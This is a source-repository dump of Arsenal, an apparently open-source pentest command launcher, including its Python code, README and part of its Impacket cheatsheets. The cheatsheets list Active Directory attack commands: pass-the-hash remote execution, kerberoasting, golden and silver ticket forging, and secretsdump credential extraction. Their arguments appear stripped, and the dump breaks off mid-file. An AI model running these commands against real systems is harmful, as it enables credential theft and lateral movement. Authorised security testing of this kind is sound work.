├── .github └── workflows │ └── lint_python.yml ├── .gitignore ├── LICENSE ├── MANIFEST.in ├── PKGBUILD ├── README.md ├── addalias.sh ├── arsenal ├── __init__.py ├── __main__.py ├── app.py ├── data │ └── cheats │ │ ├── Active_directory │ │ ├── Impacket │ │ │ ├── impacket-execute.md │ │ │ ├── impacket-kerberos.md │ │ │ ├── impacket-secrets.md │ │ │ ├── impacket-servertool-mitm.md │ │ │ ├── impacket-smb_msrpc.md │ │ │ └── impacket.md │ │ ├── SCShell.md │ │ ├── bloodhound.md │ │ ├── certipy.md │ │ ├── cme.md │ │ ├── coercer.md │ │ ├── kerberos.md │ │ ├── laps.md │ │ ├── lsassy.md │ │ ├── machine_account_coerce_abuse.md │ │ ├── mitm6.md │ │ ├── nxc.md │ │ ├── powerview.md │ │ ├── responder.md │ │ ├── rpcclient.md │ │ └── rubeus.md │ │ ├── Archive │ │ ├── 7z.md │ │ ├── binwalk.md │ │ ├── gzip.md │ │ ├── rar.md │ │ ├── tar.md │ │ ├── unblob.md │ │ └── zip.md │ │ ├── BruteForce │ │ ├── hydra.md │ │ └── wordlist │ │ │ ├── cewl.md │ │ │ └── crunch.md │ │ ├── Cloud │ │ └── aws.md │ │ ├── Crypto │ │ └── gpg.md │ │ ├── Databases │ │ └── redis.md │ │ ├── Deserialization │ │ ├── ysoserial.md │ │ └── ysoserial.net.md │ │ ├── Files │ │ ├── Download │ │ │ ├── bitsadmin.md │ │ │ ├── certutil.md │ │ │ └── powershell.md │ │ └── Server │ │ │ └── server.md │ │ ├── Flashrom │ │ └── flashrom.md │ │ ├── Install │ │ ├── brew.md │ │ └── yum.md │ │ ├── Language │ │ ├── Java │ │ │ ├── java.md │ │ │ └── keytool.md │ │ ├── c.md │ │ ├── dotnet.md │ │ ├── javascript.md │ │ ├── nodejs.md │ │ └── php.md │ │ ├── Linux │ │ ├── crontab.md │ │ ├── grep.md │ │ ├── i686-w64-mingw32-gcc.md │ │ ├── linux.md │ │ ├── misc.md │ │ ├── sed.md │ │ └── veracrypt.md │ │ ├── Metasploit │ │ ├── msf.md │ │ └── searchsploit.md │ │ ├── Mobile │ │ └── Android │ │ │ ├── android.md │ │ │ ├── apktool.md │ │ │ ├── jadx.md │ │ │ └── objection.md │ │ ├── Network │ │ ├── chisel.md │ │ ├── network.md │ │ └── socat.md │ │ ├── Password cracking │ │ ├── crackfiles.md │ │ ├── hashcat.md │ │ └── john.md │ │ ├── Password extraction │ │ ├── LAPS.md │ │ ├── lazagne.md │ │ ├── mimikatz.md │ │ └── procdump.md │ │ ├── Protocol │ │ ├── dns.md │ │ ├── ftp.md │ │ ├── ldap.md │ │ ├── mssql.md │ │ ├── mysql.md │ │ ├── netbios.md │ │ ├── nfs.md │ │ ├── pop.md │ │ ├── postgres.md │ │ ├── rdp.md │ │ ├── smb │ │ │ ├── enum4linux.md │ │ │ ├── smb.md │ │ │ └── smbmap.md │ │ ├── smtp.md │ │ ├── snmp.md │ │ ├── ssh.md │ │ ├── telnet.md │ │ ├── vnc.md │ │ ├── winrm.md │ │ └── x11.md │ │ ├── Pwn │ │ └── bof.md │ │ ├── README.md │ │ ├── README.rst │ │ ├── Race Condition │ │ └── racecondition.md │ │ ├── ReverseShell │ │ ├── msfvenom.md │ │ ├── nc.md │ │ ├── reverse_shell.md │ │ └── web_shell.md │ │ ├── SQL Injection │ │ └── sqlmap.md │ │ ├── Scan │ │ ├── cve-bin-tool.md │ │ ├── eyewitness.md │ │ ├── gowitness.md │ │ └── nmap.md │ │ ├── Services │ │ ├── service.md │ │ └── systemctl.md │ │ ├── Tools │ │ ├── docker.md │ │ ├── git.md │ │ └── kubernetes.md │ │ ├── Web │ │ ├── drupwn.md │ │ ├── fuzzer.md │ │ ├── jwttool.md │ │ ├── openssl.md │ │ ├── tomcat.md │ │ ├── web.md │ │ └── wpscan.md │ │ ├── Wifi │ │ └── wifi.md │ │ ├── Windows │ │ ├── powershell.md │ │ ├── whitelisting.md │ │ └── windows.md │ │ └── arsenal.md └── modules │ ├── __init__.py │ ├── cheat.py │ ├── check.py │ ├── command.py │ ├── config.py │ └── gui.py ├── img ├── arsenal.gif ├── arsenal_update.png └── logo.png ├── mindmap ├── ACEs_xmind.png ├── Abusing_ACEs.xmind ├── Pentesting_MS_Exchange_Server_on_the_Perimeter.png └── Pentesting_MS_Exchange_Server_on_the_Perimeter.xmind ├── my_cheats └── .gitignore ├── pushtopip.sh ├── pyproject.toml ├── requirements.txt ├── run └── setup.py /.github/workflows/lint_python.yml: -------------------------------------------------------------------------------- 1 | name: lint_python 2 | on: [pull_request, push] 3 | jobs: 4 | lint_python: 5 | runs-on: ubuntu-latest 6 | steps: 7 | - uses: actions/checkout@v2 8 | - uses: actions/setup-python@v2 9 | - run: pip install --upgrade pip wheel 10 | - run: pip install bandit black codespell flake8 flake8-bugbear 11 | flake8-comprehensions isort mypy pytest pyupgrade safety 12 | - run: bandit --recursive --skip B404,B602,B605 . 13 | - run: black --check . || true 14 | - run: codespell --ignore-words-list="fo,seh" 15 | - run: flake8 --ignore=B001,B007,C408,E111,E127,E203,E261,E265,E303,E402,E701,E711,E722,F401,F541,F841,W291,W293,W503 16 | --max-complexity=32 --max-line-length=118 --show-source --statistics . 17 | - run: isort --check-only --profile black . || true 18 | - run: pip install -r requirements.txt 19 | - run: mkdir --parents --verbose .mypy_cache 20 | - run: mypy --ignore-missing-imports --install-types --non-interactive . || true 21 | - run: pytest . || pytest --doctest-modules . || true 22 | - run: shopt -s globstar && pyupgrade --py36-plus **/*.py || true 23 | - run: safety check 24 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | .venv/ 2 | .idea/ 3 | __pycache__/ 4 | *.pyc 5 | .arsenal.json 6 | arsenal/data/cheats/.obsidian/ 7 | cheats/.obsidian/ 8 | cheats/Arsenal/.obsidian/ 9 | arsenal.egg-info/ 10 | arsenal_cli.egg-info/ 11 | build/ 12 | dist/ 13 | Pipfile.lock 14 | Pipfile 15 | -------------------------------------------------------------------------------- /MANIFEST.in: -------------------------------------------------------------------------------- 1 | include LICENSE README.md requirements.txt run addalias.sh 2 | include *.py 3 | recursive-include arsenal/data/cheats * 4 | recursive-include img * 5 | recursive-exclude .obsidian * 6 | recursive-exclude mindmap * 7 | recursive-exclude my_cheats * 8 | recursive-exclude cheats/.obsidian * 9 | recursive-exclude arsenal.egg-info * 10 | 11 | -------------------------------------------------------------------------------- /PKGBUILD: -------------------------------------------------------------------------------- 1 | #Maintainer: Viking @Vikingfr 2 | #Maintainer: Mayfly @M4yFly 3 | #Maintainer: Erick Sanchez Vera "T1erno" 4 | 5 | pkgname=arsenal 6 | pkgver=1.2.1 7 | pkgrel=1 8 | pkgdesc='Arsenal is just a quick inventory and launcher for hacking programs' 9 | url='https://github.com/Orange-Cyberdefense/arsenal' 10 | arch=('any') 11 | license=('GPL') 12 | depends=('python>=3.7') 13 | source=(${pkgname}::git+https://github.com/Orange-Cyberdefense/arsenal.git) 14 | sha512sums=('SKIP') 15 | 16 | build() { 17 | cd $pkgname 18 | python setup.py build 19 | } 20 | 21 | package() { 22 | cd $pkgname 23 | 24 | echo "alias a='arsenal'" >> ~/.bash_aliases 25 | echo "alias a='arsenal'" >> ~/.zshrc 26 | echo "alias a='arsenal'" >> ~/.bashrc 27 | 28 | python setup.py install --prefix=/usr --root="${pkgdir}" -O1 --skip-build 29 | install -Dm 644 LICENSE -t "${pkgdir}"/usr/share/licenses/${pkgname} 30 | install -Dm 644 README.md -t "${pkgdir}"/usr/share/doc/${pkgname} 31 | } 32 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Arsenal 2 | 3 | ![](img/logo.png) 4 | 5 | Arsenal is just a quick inventory, reminder and launcher for pentest commands. 6 |
This project written by pentesters for pentesters simplify the use of all the hard-to-remember commands 7 | 8 | ![](img/arsenal.gif) 9 | 10 | In arsenal you can search for a command, select one and it's prefilled directly in your terminal. This functionality is independent of the shell used. Indeed arsenal emulates real user input (with TTY arguments and IOCTL) so arsenal works with all shells and your commands will be in the history. 11 | 12 | You have to enter arguments if needed, but arsenal supports global variables.
13 | For example, during a pentest we can set the variable `ip` to prefill all commands using an ip with the right one. 14 | 15 | To do that you just have to enter the following command in arsenal: 16 | ``` 17 | >set ip=10.10.10.10 18 | ``` 19 | 20 | Authors: 21 | * Guillaume Muh 22 | * mayfly 23 | 24 | This project is inspired by navi () because the original version was in bash and too hard to understand to add features 25 | 26 | 27 | ## Arsenal new features 28 | 29 | ![](img/arsenal_update.png) 30 | 31 | - New colors 32 | - Add tmux new pane support (with -t) 33 | - Add default values in cheatsheets commands with `` 34 | - Support description inside cheatsheets 35 | - New categories and Tags 36 | - New cheatsheets 37 | - Add yml support (thx @0xswitch ) 38 | - Add fzf support with ctrl+t (thx @mgp25) 39 | - Add prefix to commands generated (with -f) 40 | 41 | ## Install & Launch 42 | - with pip : 43 | ``` 44 | python3 -m pip install arsenal-cli 45 | ``` 46 | 47 | - run (we also advice you to add this alias : `alias a='arsenal'`) 48 | ``` 49 | arsenal 50 | ``` 51 | 52 | - manually: 53 | ``` 54 | git clone https://github.com/Orange-Cyberdefense/arsenal.git 55 | cd arsenal 56 | python3 -m pip install -r requirements.txt 57 | ./run 58 | ``` 59 | 60 | Inside your .bashrc or .zshrc add the path to `run` to help you do that you could launch the addalias.sh script 61 | ``` 62 | ./addalias.sh 63 | ``` 64 | 65 | - Also if you are an Arch user you can install from the AUR: 66 | ```bash 67 | git clone https://aur.archlinux.org/arsenal.git 68 | cd arsenal 69 | makepkg -si 70 | ``` 71 | - Or with an AUR helper like yay: 72 | ```bash 73 | yay -S arsenal 74 | ``` 75 | 76 | ## Launch in tmux mode 77 | 78 | ``` 79 | ./run -t # if you launch arsenal in a tmux window with one pane, it will split the window and send the command to the otherpane without quitting arsenal 80 | # if the window is already split the command will be send to the other pane without quitting arsenal 81 | ./run -t -e # just like the -t mode but with direct execution in the other pane without quitting arsenal 82 | ``` 83 | 84 | ## Add external cheatsheets 85 | 86 | You could add your own cheatsheets inside the my_cheats folder or in the ~/.cheats folder. 87 | 88 | You could also add additional paths to the file `/arsenal/modules/config.py`, 89 | arsenal reads `.md` (MarkDown) and `.rst` (RestructuredText). 90 | 91 | ``` 92 | CHEATS_PATHS = [ 93 | join(BASEPATH, "cheats"), # DEFAULT 94 | join(HOMEPATH, "docs/my_cheats") 95 | ] 96 | ``` 97 | 98 | Cheatsheets examples are in `/cheats`: `README.md` and `README.rst` 99 | 100 | ## Add a prefix commands generated 101 | 102 | In order to prefix commands generated by arsenal you need to set the `arsenal_prefix_cmd` global variable. 103 | 104 | For example if you need your commands to be prefixed with `proxychains -q`: 105 | ``` 106 | >set arsenal_prefix_cmd=proxychains -q 107 | ``` 108 | 109 | then you can start run arsenal with the prefix option: 110 | ```bash 111 | arsenal -f 112 | ``` 113 | 114 | ## Troubleshooting 115 | 116 | If you got on error on color init try : 117 | ``` 118 | export TERM='xterm-256color' 119 | ``` 120 | 121 | -- 122 | 123 | If you have the following exception when running Arsenal: 124 | ``` 125 | ImportError: cannot import name 'FullLoader' 126 | ``` 127 | First, check that requirements are installed: 128 | ``` 129 | pip install -r requirements.txt 130 | ``` 131 | If the exception is still there: 132 | ``` 133 | pip install -U PyYAML 134 | ``` 135 | 136 | -- 137 | 138 | If you encounter an exception similar to the following (contains TIOCSTI in strace) when running Arsenal: 139 | ``` 140 | [...] 141 | fcntl.ioctl(stdin, termios.TIOCSTI, c) 142 | OSError: [Errno 5] Input/output error 143 | ``` 144 | Then you may need to re-enable TIOCSTI. Please run the following commands as root to fix this issue on the current session : 145 | ``` 146 | sysctl -w dev.tty.legacy_tiocsti=1 147 | ``` 148 | If you want this workaround to survive a reboot, add the following configuration to sysctl.conf file and reboot : 149 | ``` 150 | echo "dev.tty.legacy_tiocsti=1" >> /etc/sysctl.conf 151 | ``` 152 | More information is available in the issue [https://github.com/Orange-Cyberdefense/arsenal/issues/77](https://github.com/Orange-Cyberdefense/arsenal/issues/77) 153 | 154 | 155 | ## Mindmap 156 | - Active directory mindmap 157 | - Due to csp on github when you open the svg, we moved the AD mindmap and the source to this repository : [https://github.com/Orange-Cyberdefense/ocd-mindmaps](https://github.com/Orange-Cyberdefense/ocd-mindmaps) 158 | 159 | [https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg](https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg) 160 | 161 | - AD mindmap black version 162 | ![](./mindmap/pentest_ad_black.png) 163 | 164 | - Exchange Mindmap (thx to @snovvcrash) 165 | ![](./mindmap/Pentesting_MS_Exchange_Server_on_the_Perimeter.png) 166 | 167 | - Active directory ACE mindmap 168 | ![](./mindmap/ACEs_xmind.png) 169 | 170 | ## TODO cheatsheets 171 | 172 | ### reverse shell 173 | - [X] msfvenom 174 | - [X] php 175 | - [X] python 176 | - [X] perl 177 | - [X] powershell 178 | - [X] java 179 | - [X] ruby 180 | 181 | ### whitebox analysis grep regex 182 | - [X] php 183 | - [X] nodejs 184 | - [X] hash 185 | 186 | ### Tools 187 | 188 | #### smb 189 | - [X] enum4linux 190 | - [X] smbmap 191 | - [ ] smbget 192 | - [X] rpcclient 193 | - [ ] rpcinfo 194 | - [X] nbtscan 195 | - [X] impacket 196 | 197 | #### kerberos & AD 198 | - [X] impacket 199 | - [X] bloodhound 200 | - [X] rubeus 201 | - [ ] powerview 202 | - [ ] shadow credentials attack 203 | - [ ] samaccountname attack 204 | 205 | #### MITM 206 | - [X] mitm6 207 | - [X] responder 208 | 209 | #### Unserialize 210 | - [X] ysoserial 211 | - [ ] ysoserial.net 212 | 213 | ### bruteforce & pass cracking 214 | - [X] hydra 215 | - [X] hashcat 216 | - [X] john 217 | 218 | #### scan 219 | - [X] nmap 220 | - [X] eyewitness 221 | - [X] gowitness 222 | 223 | #### fuzz 224 | - [X] gobuster 225 | - [X] ffuf 226 | - [X] wfuzz 227 | 228 | #### DNS 229 | - [X] dig 230 | - [X] dnsrecon 231 | - [X] dnsenum 232 | - [X] sublist3r 233 | 234 | #### rpc 235 | - [ ] rpcbind 236 | 237 | #### netbios-ssn 238 | - [X] snmpwalk 239 | - [X] snmp-check 240 | - [X] onesixtyone 241 | 242 | #### sql 243 | - [X] sqlmap 244 | 245 | #### oracle 246 | - [ ] oscanner 247 | - [ ] sqlplus 248 | - [ ] tnscmd10g 249 | 250 | #### mysql 251 | - [X] mysql 252 | 253 | #### nfs 254 | - [X] showmount 255 | 256 | #### rdp 257 | - [X] xfreerdp 258 | - [X] rdesktop 259 | - [ ] ncrack 260 | 261 | #### mssql 262 | - [X] sqsh 263 | 264 | #### winrm 265 | - [X] evilwinrm 266 | 267 | #### redis 268 | - [ ] redis-cli 269 | 270 | #### postgres 271 | - [X] psql 272 | - [ ] pgdump 273 | 274 | #### vnc 275 | - [X] vncviewer 276 | 277 | #### x11 278 | - [X] xspy 279 | - [X] xwd 280 | - [X] xwininfo 281 | 282 | #### ldap 283 | - [X] ldapsearch 284 | 285 | #### https 286 | - [ ] sslscan 287 | 288 | #### web 289 | - [ ] burp 290 | - [X] nikto 291 | - [ ] tplmap 292 | 293 | #### app web 294 | - [X] drupwn 295 | - [X] wpscan 296 | - [ ] nuclei 297 | -------------------------------------------------------------------------------- /addalias.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )" 4 | echo "# To permentally add arsenal as the command 'a' add this to your ~/.bashrc, ~/.zshrc, ~/.bash_aliases depending on your shell configuration :" 5 | echo "alias a='${DIR}/run'" 6 | 7 | echo "Examples :" 8 | echo "echo \"alias a='${DIR}/run'\" >> ~/.bash_aliases" 9 | echo "echo \"alias a='${DIR}/run'\" >> ~/.zshrc" 10 | echo "echo \"alias a='${DIR}/run'\" >> ~/.bashrc" 11 | echo "echo \"alias a='${DIR}/run'\" >> ~/.config/fish/config.fish" 12 | -------------------------------------------------------------------------------- /arsenal/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | pentest command launcher 3 | """ 4 | 5 | __author__ = 'Guillaume Muh, mayfly' 6 | __author_email__ = 'no-reply@orange.com' 7 | __license__ = 'GPL-3.0' 8 | __url__ = 'https://github.com/Orange-Cyberdefense/arsenal' 9 | __version__ = '1.2.7' 10 | -------------------------------------------------------------------------------- /arsenal/__main__.py: -------------------------------------------------------------------------------- 1 | """ 2 | Main entry point for running Arsenal as a module. 3 | """ 4 | import sys 5 | 6 | if sys.version_info < (3, 6): 7 | raise SystemExit( 8 | "Sorry, Python 3.6 (or greater) is required to run Arsenal. ABORTING." 9 | ) 10 | 11 | from .app import main 12 | 13 | if __name__ == "__main__": 14 | main() 15 | -------------------------------------------------------------------------------- /arsenal/app.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | import json 3 | import os 4 | import fcntl 5 | import termios 6 | import re 7 | import time 8 | from curses import wrapper 9 | 10 | # arsenal 11 | from . import __version__ 12 | from .modules import config 13 | from .modules import cheat 14 | from .modules import check 15 | from .modules import gui as arsenal_gui 16 | 17 | 18 | class App: 19 | 20 | def __init__(self): 21 | pass 22 | 23 | def get_args(self): 24 | examples = '''examples: 25 | arsenal 26 | arsenal --copy 27 | arsenal --print 28 | 29 | You can manage global variables with: 30 | >set GLOBALVAR1= 31 | >show 32 | >clear 33 | 34 | (cmd starting with '>' are internals cmd) 35 | ''' 36 | 37 | parser = argparse.ArgumentParser( 38 | prog="arsenal", 39 | description='arsenal v{} - Pentest command launcher'.format(__version__), 40 | epilog=examples, 41 | formatter_class=argparse.RawTextHelpFormatter 42 | ) 43 | 44 | group_out = parser.add_argument_group('output [default = prefill]') 45 | group_out.add_argument('-p', '--print', action='store_true', help='Print the result') 46 | group_out.add_argument('-o', '--outfile', action='store', help='Output to file') 47 | group_out.add_argument('-x', '--copy', action='store_true', help='Output to clipboard') 48 | group_out.add_argument('-e', '--exec', action='store_true', help='Execute cmd') 49 | group_out.add_argument('-t', '--tmux', action='store_true', help='Send command to tmux panel') 50 | group_out.add_argument('-c', '--check', action='store_true', help='Check the existing commands') 51 | group_out.add_argument('-f', '--prefix', action='store_true', help='command prefix') 52 | group_out.add_argument('--no-tags', action='store_false', help='Whether or not to show the' 53 | ' tags when drawing the cheats') 54 | parser.add_argument('-V', '--version', action='version', version='%(prog)s (version {})'.format(__version__)) 55 | 56 | return parser.parse_args() 57 | 58 | def run(self): 59 | args = self.get_args() 60 | 61 | # load cheatsheets 62 | cheatsheets = cheat.Cheats().read_files(config.CHEATS_PATHS, config.FORMATS, 63 | config.EXCLUDE_LIST) 64 | 65 | if args.check: 66 | check.check(cheatsheets) 67 | else: 68 | self.start(args, cheatsheets) 69 | 70 | def start(self, args, cheatsheets): 71 | arsenal_gui.Gui.with_tags = args.no_tags 72 | 73 | # create gui object 74 | gui = arsenal_gui.Gui() 75 | while True: 76 | # launch gui 77 | cmd = gui.run(cheatsheets, args.prefix) 78 | 79 | if cmd == None: 80 | exit(0) 81 | 82 | # Internal CMD 83 | elif cmd.cmdline[0] == '>': 84 | if cmd.cmdline == ">exit": 85 | break 86 | elif cmd.cmdline == ">show": 87 | if (os.path.exists(config.savevarfile)): 88 | with open(config.savevarfile, 'r') as f: 89 | arsenalGlobalVars = json.load(f) 90 | for k, v in arsenalGlobalVars.items(): 91 | print(k + "=" + v) 92 | break 93 | elif cmd.cmdline == ">clear": 94 | with open(config.savevarfile, "w") as f: 95 | f.write(json.dumps({})) 96 | self.run() 97 | elif re.match(r"^\>set( [^= ]+=[^= ]+)+$", cmd.cmdline): 98 | # Load previous global var 99 | if (os.path.exists(config.savevarfile)): 100 | with open(config.savevarfile, 'r') as f: 101 | arsenalGlobalVars = json.load(f) 102 | else: 103 | arsenalGlobalVars = {} 104 | # Add new glovar var 105 | varlist = re.findall("([^= ]+)=([^= ]+)", cmd.cmdline) 106 | for v in varlist: 107 | arsenalGlobalVars[v[0]] = v[1] 108 | with open(config.savevarfile, "w") as f: 109 | f.write(json.dumps(arsenalGlobalVars)) 110 | else: 111 | print("Arsenal: invalid internal command..") 112 | break 113 | 114 | # OPT: Copy CMD to clipboard 115 | elif args.copy: 116 | try: 117 | import pyperclip 118 | pyperclip.copy(cmd.cmdline) 119 | except ImportError: 120 | pass 121 | break 122 | 123 | # OPT: Only print CMD 124 | elif args.print: 125 | print(cmd.cmdline) 126 | break 127 | 128 | # OPT: Write in file 129 | elif args.outfile: 130 | with open(args.outfile, 'w') as f: 131 | f.write(cmd.cmdline) 132 | break 133 | 134 | # OPT: Exec 135 | elif args.exec and not args.tmux: 136 | os.system(cmd.cmdline) 137 | break 138 | 139 | elif args.tmux: 140 | try: 141 | import libtmux 142 | try: 143 | server = libtmux.Server() 144 | session = server.list_sessions()[-1] 145 | window = session.attached_window 146 | panes = window.panes 147 | if len(panes) == 1: 148 | # split window to get more pane 149 | pane = window.split_window(attach=False) 150 | time.sleep(0.3) 151 | else: 152 | pane = panes[-1] 153 | # send command to other pane and switch pane 154 | if args.exec: 155 | pane.send_keys(cmd.cmdline) 156 | else: 157 | pane.send_keys(cmd.cmdline, enter=False) 158 | pane.select_pane() 159 | except libtmux.exc.LibTmuxException: 160 | self.prefil_shell_cmd(cmd) 161 | break 162 | except ImportError: 163 | self.prefil_shell_cmd(cmd) 164 | break 165 | # DEFAULT: Prefill Shell CMD 166 | else: 167 | self.prefil_shell_cmd(cmd) 168 | break 169 | 170 | def prefil_shell_cmd(self, cmd): 171 | stdin = 0 172 | # save TTY attribute for stdin 173 | oldattr = termios.tcgetattr(stdin) 174 | # create new attributes to fake input 175 | newattr = termios.tcgetattr(stdin) 176 | # disable echo in stdin -> only inject cmd in stdin queue (with TIOCSTI) 177 | newattr[3] &= ~termios.ECHO 178 | # enable non canonical mode -> ignore special editing characters 179 | newattr[3] &= ~termios.ICANON 180 | # use the new attributes 181 | termios.tcsetattr(stdin, termios.TCSANOW, newattr) 182 | # write the selected command in stdin queue 183 | try: 184 | for c in cmd.cmdline: 185 | fcntl.ioctl(stdin, termios.TIOCSTI, c) 186 | except OSError: 187 | message = "========== OSError ============\n" 188 | message += "Arsenal needs TIOCSTI enable for running\n" 189 | message += "Please run the following commands as root to fix this issue on the current session :\n" 190 | message += "sysctl -w dev.tty.legacy_tiocsti=1\n" 191 | message += "If you want this workaround to survive a reboot,\n" 192 | message += "add the following configuration to sysctl.conf file and reboot :\n" 193 | message += "echo \"dev.tty.legacy_tiocsti=1\" >> /etc/sysctl.conf\n" 194 | message += "More details about this bug here: https://github.com/Orange-Cyberdefense/arsenal/issues/77" 195 | print(message) 196 | # restore TTY attribute for stdin 197 | termios.tcsetattr(stdin, termios.TCSADRAIN, oldattr) 198 | 199 | 200 | def main(): 201 | try: 202 | App().run() 203 | except KeyboardInterrupt: 204 | exit(0) 205 | 206 | 207 | if __name__ == "__main__": 208 | wrapper(main()) 209 | -------------------------------------------------------------------------------- /arsenal/data/cheats/Active_directory/Impacket/impacket-execute.md: -------------------------------------------------------------------------------- 1 | # impacket 2 | 3 | % impacket, windows, exec 4 | 5 | ## PSEXEC with username 6 | #plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT 7 | create a new service (using \pipe\svcctl via SMB) 8 | 9 | ``` 10 | psexec.py /:@ 11 | ``` 12 | 13 | ## PSEXEC with pass the Hash (pth) 14 | #plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT 15 | create a new service (using \pipe\svcctl via SMB) 16 | 17 | ``` 18 | psexec.py -hashes @ 19 | ``` 20 | 21 | ## PSEXEC with kerberos 22 | #plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT 23 | create a new service (using \pipe\svcctl via SMB) 24 | 25 | ``` 26 | export KRB5CCNAME=; psexec.py -dc-ip -target-ip > -no-pass -k /@ 27 | ``` 28 | 29 | ## SMBEXEC with username 30 | #plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT 31 | create a new service 'BTOBTO' (using temp bat files via SMB) 32 | ``` 33 | smbexec.py /:@ 34 | ``` 35 | 36 | ## SMBEXEC with pass the Hash (pth) 37 | #plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT 38 | create a new service 'BTOBTO' (using temp bat files via SMB) 39 | ``` 40 | smbexec.py -hashes @ 41 | ``` 42 | 43 | ## SMBEXEC with kerberos 44 | #plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT 45 | create a new service 'BTOBTO' (using temp bat files via SMB) 46 | ``` 47 | export KRB5CCNAME=; smbexec.py -dc-ip -target-ip > -no-pass -k /@ 48 | ``` 49 | 50 | ## wmiexec 51 | #plateform/linux #target/remote #port/135 #protocol/wmi #cat/ATTACK/CONNECT 52 | Execute a command shell without touching the disk or running a new service using DCOM 53 | 54 | ``` 55 | wmiexec.py /:@ 56 | ``` 57 | 58 | ## wmiexec with pass the hash (pth) 59 | #plateform/linux #target/remote #port/135 #protocol/wmi #cat/ATTACK/CONNECT 60 | 61 | Execute a command shell without touching the disk or running a new service using DCOM 62 | 63 | ``` 64 | wmiexec.py -hashes @ 65 | ``` 66 | 67 | ## atexec - execute command view the task scheduler 68 | #plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT 69 | Using \pipe\atsvc via SMB 70 | 71 | ``` 72 | atexec.py /:@ "command" 73 | ``` 74 | 75 | ## atexec pass the hash (pth) 76 | #plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT 77 | Execute command view the task scheduler (using \pipe\atsvc via SMB) 78 | 79 | ``` 80 | atexec.py -hashes @ "command" 81 | ``` 82 | -------------------------------------------------------------------------------- /arsenal/data/cheats/Active_directory/Impacket/impacket-kerberos.md: -------------------------------------------------------------------------------- 1 | # Impacket 2 | 3 | % impacket, windows, kerberos, 88 4 | 5 | ## GetNPUsers without password to get TGT (ASREPRoasting) 6 | #plateform/linux #target/remote #cat/ATTACK/EXPLOIT 7 | ``` 8 | GetNPUsers.py / -no-pass -request -format hashcat 9 | ``` 10 | 11 | ## GetNPUsers - attempt to list and get TGTs for those users that have the property ‘Do not require Kerberos preauthentication’ (ASREPRoasting) 12 | #plateform/linux #target/remote #cat/ATTACK/EXPLOIT 13 | ``` 14 | GetNPUsers.py -dc-ip / -usersfile -format hashcat 15 | ``` 16 | 17 | ## GetUSERSPN - find Service Principal Names that are associated with a normal user account (kerberoasting) 18 | #plateform/linux #target/remote #cat/ATTACK/EXPLOIT 19 | ``` 20 | GetUserSPNs.py -request -dc-ip /: 21 | ``` 22 | 23 | ## MS14-068 - goldenPac 24 | #plateform/linux #target/remote #cat/ATTACK/EXPLOIT 25 | ``` 26 | goldenPac.py -dc-ip /:''@ 27 | ``` 28 | 29 | ## Ticketer - (golden ticket) - generate TGT/TGS tickets into ccache format which can be converted further into kirbi. 30 | #plateform/linux #target/local #cat/ATTACK/EXPLOIT 31 | ``` 32 | ticketer.py -nthash -domain-sid -domain 33 | ``` 34 | 35 | ## Ticketer - (silver ticket) - generate TGS tickets into ccache format which can be converted further into kirbi. 36 | #plateform/linux #target/local #cat/ATTACK/EXPLOIT 37 | ``` 38 | ticketer.py -nthash -domain-sid -domain -spn 39 | ``` 40 | 41 | ## TicketConverter - convert kirbi files (commonly used by mimikatz) into ccache files used by impacket 42 | #plateform/linux #target/local #cat/UTILS 43 | ``` 44 | ticketConverter.py 45 | ``` 46 | 47 | ## Silver ticket - impersonate user 48 | #plateform/linux #target/remote #cat/ATTACK/EXPLOIT 49 | ``` 50 | getST.py -spn cifs/ /\$ -impersonate 51 | ``` 52 | 53 | ## GetTGT - request a TGT and save it as ccache for given a password, hash or aesKey 54 | #plateform/linux #target/remote #cat/UTILS 55 | ``` 56 | getTGT.py -dc-ip -hashes : / 57 | ``` 58 | 59 | ## GetADUser - gather data about the domain’s users and their corresponding email addresses 60 | #plateform/linux #target/remote #cat/RECON 61 | ``` 62 | GetADUsers.py -all /: -dc-ip 63 | ``` 64 | -------------------------------------------------------------------------------- /arsenal/data/cheats/Active_directory/Impacket/impacket-secrets.md: -------------------------------------------------------------------------------- 1 | # Impacket 2 | 3 | % impacket, windows, smb, 445 4 | 5 | ## samrdump - system account, shares, etc... (dump info from the Security Account Manager (SAM)) 6 | #plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER 7 | ``` 8 | samrdump.py /:@ 9 | ``` 10 | 11 | ## secretsdump 12 | #plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER 13 | ``` 14 | secretsdump.py '/:'@ 15 | ``` 16 | 17 | ## secretsdump local dump - extract hash from sam database 18 | #plateform/linux #target/local #cat/POSTEXPLOIT/CREDS_RECOVER 19 | ``` 20 | secretsdump.py -system -sam LOCAL 21 | ``` 22 | 23 | ## secretsdump local dump - extract hash from ntds.dit 24 | #plateform/linux #target/local #cat/POSTEXPLOIT/CREDS_RECOVER 25 | ``` 26 | secretsdump.py -ntds -system -hashes LOCAL -outputfile 27 | ``` 28 | 29 | ## secretsdump - anonymous get administrator 30 | zerologon 31 | #plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER 32 | ``` 33 | secretsdump.py /\$/@ -no-pass -just-dc-user "Administrator" 34 | ``` 35 | 36 | ## secretsdump - remote extract 37 | #plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER 38 | ``` 39 | secretsdump.py -just-dc-ntlm -outputfile /:@ 40 | ``` 41 | 42 | ## secretsdump - remote extract + users infos 43 | #plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER 44 | ``` 45 | secretsdump.py 